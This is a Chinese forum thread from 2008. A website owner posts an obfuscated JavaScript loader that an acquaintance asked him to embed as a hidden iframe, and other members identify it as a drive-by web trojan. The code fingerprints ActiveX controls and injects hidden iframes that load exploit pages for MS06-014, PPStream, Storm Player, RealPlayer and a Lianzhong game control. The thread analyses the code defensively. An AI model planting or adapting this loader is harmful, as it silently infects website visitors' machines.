打印

一段JS代码 我狠疑惑

<script>
function init(){
       document.write()
              }window.onload=init;
       if(document.cookie.indexOf('wsxinn3698')==-1){
              var yt1="id:";
              var yt2="983A-";
       var yt8aqqid="cl"+"s"+yt1+"BD"+"96"+"C5"+"56-"+"65A3"+"-"+"11"+"D0-"+yt2+"00C"+"04"+"FC"+"29"+"E"+"36";
       try{var e;
       var ado=(document.createElement("object"));
       ado.setAttribute("classid", yt8aqqid);
       var as=ado.createobject("Adodb.Stream","");
       }catch(e){

       };
       finally{
       var expires=new Date();
       expires.setTime(expires.getTime()+24*60*60*1000);
       document.cookie='wsxinn3698=tcsafeSave;path=/;expires='+expires.toGMTString();
       if(e!="[object Error]"){
       document.write("<iframe width='20' height='20' src='Pps.htm'></iframe>")
       document.write("<iframe width='0' height='0' src='Ms06014.htm'></iframe>")
       }else{
       try{
       var r;
       var real=new ActiveXObject("IERPCtl.IERPCtl.1");
       }
       catch(r){

       };
       finally{
       if(r!="[object Error]"){
       document.write("<script src=Real11.gif><\/script>")
       document.write("<script src=Real.gif><\/script>")}
       }
       try{
       var s;
       var storm=new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer");
       }
       catch(s){

       };
       finally{
       if(s!="[object Error]"){document.write("<iframe width='5' height='5' src='Bfyy.htm'></iframe>")}
       }try{
       var l;
       var Lz=new ActiveXObject("GLCHAT.GLCh"+"atCtrl.1");
       }catch(l){

       };
       finally{
       if(l!="[object Error]"){document.write("<iframe width='5' height='5' src='Lz.htm'></iframe>")}
       }
                                   }
                     }
       }
</script>


就是这段代码 .一个不太熟的朋友要我帮忙挂个0象素的IF框架在我的网站里.我在框架里找到这个网页看源代码.里面有段JS的代码.我不太明白.希望大家帮我分析一下.



上面就是加载项!

[ 本帖最后由 missrinj 于 2008-6-29 21:05 编辑 ]
附件: 您所在的用户组无法下载或查看附件,您需要注册/登录后才能查看!
另外还会弹出一个加载项的
alert(yt8aqqid);
//到百度里看看是个什么控件
lost
网页木马...N个..

Ms06014.htm
上面这个应该是ms06014漏洞的利用代码


if(l!="[object Error]"){document.write("<iframe width='5' height='5' src='Lz.htm'></iframe>")}
这个应该是 联众游戏里面的一个控件漏洞利用代码..


if(s!="[object Error]"){document.write("<iframe width='5' height='5' src='Bfyy.htm'></iframe>")}
这个是暴风影音 控件的溢出漏洞利用代码..

看图片上,应该还有一个 Realone 控件的漏洞利用代码.



再补充一个
document.write("<iframe width='20' height='20' src='Pps.htm'></iframe>")

这个应该是 PPStream 网络电视的一个控件漏洞利用代码

[ 本帖最后由 faeng220 于 2008-6-30 09:00 编辑 ]

TOP

还在为头像烦恼?还在为不能关注好友动态烦忧?快来蓝色理想家园吧!